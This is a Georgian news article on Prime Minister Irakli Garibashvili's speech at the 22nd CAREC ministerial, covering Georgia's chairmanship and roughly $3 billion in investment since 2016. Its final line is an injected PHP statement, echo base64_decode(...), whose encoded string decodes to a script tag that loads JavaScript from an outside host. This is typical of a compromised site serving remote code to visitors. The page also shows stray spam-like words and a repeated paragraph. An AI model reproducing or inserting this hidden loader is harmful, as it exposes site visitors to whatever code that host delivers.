celsiusi
ავერსი შნაიდერი

"ნება მომეცით ხაზი გავუსვა ცენტრალური აზიის ეკონომიკური თანამშრომლობის რეგიონალური პროგრამისა და აზიის განვითარების ბანკის გადამწყვეტ როლს რეგიონალური ეკონომიკური განვითარების ხელშეწყობაში, ორივეს დიდი წვლილი მიუძღვის საქართველოში განხორციელებულ უამრავ პროექტსა და ღონისძიებაში," - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა ცენტრალური აზიის რეგიონული ეკონომიკური თანამშრომლობის (CAREC) პროგრამის რიგით 22-ე მინისტერიალზე სიტყვით გამოსვლისას განაცხადა.

მთავრობის მეთაურის თქმით, მას შემდეგ, რაც საქართველო 2016 წელს ცენტრალური აზიის ეკონომიკური თანამშრომლობის რეგიონალურ პროგრამას შეუერთდა, დაახლოებით 3 000 000 000 აშშ დოლარის ინვესტიცია იქნა მობილიზებული ქვეყანაში, ამის შესახებ ინფორმაციას მთავრობის ადმინისტრაცია ავრცელებს.

„2023 წელს საქართველოს ჰქონდა ცენტრალური აზიის ეკონომიკური თანამშრომლობის ამ რეგიონალური პროგრამის თავმჯდომარეობის პატივი და რადგან ეს წელი მთავრდება, სიამაყით ვაცხადებ, რომ წარმატებით შევასრულეთ ჩვენზე დაკისრებული მნიშვნელოვანი პასუხისმგებლობა.მალე - 2024 წელს - აზიის განვითარების ბანკის 57-ე ყოველწლიურ შეხვედრას სიხარულით ვუმასპინძლებთ თბილისში. დარწმუნებული ვარ, რომ ეს ღონისძიება გამორჩეულ პლატფორმად წარმოჩინდება რეგიონალური და გლობალური განვითარების საკითხებისა და შეთავაზებულ გადაწყვეტათა განხილვისთვის. ნება მომეცით ხაზი გავუსვა ცენტრალური აზიის ეკონომიკური თანამშრომლობის რეგიონალური პროგრამისა და აზიის განვითარების ბანკის გადამწყვეტ როლს რეგიონალური ეკონომიკური განვითარების ხელშეწყობაში. აღსანიშნავია, რომ ორივეს დიდი წვლილი მიუძღვის საქართველოში განხორციელებულ უამრავ პროექტსა და ღონისძიებაში. მას შემდეგ, რაც ცენტრალური აზიის ეკონომიკური თანამშრომლობის რეგიონალურ პროგრამას შეუერთდა 2016 წელს საქართველო, დაახლოებით 3 000 000 000 აშშ დოლარის ინვესტიცია იქნა მობილიზებული ქვეყანაში“, - განაცხადა პრემიერმა.

სამინისტროს ინფორმაციით, მინისტერიალს დაესწრნენ: ვიცე-პრემიერი, საქართველოს ეკონომიკისა და მდგრადი განვითარების მინისტრი, ლევან დავითაშვილი აზიის განვითარების ბანკის პრეზიდენტი მასაცუგუ ასაკავა, ასევე CAREC-ის მონაწილე ქვეყნების სახელმწიფო უწყებების უმაღლესი თანამდებობის პირები.

233
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");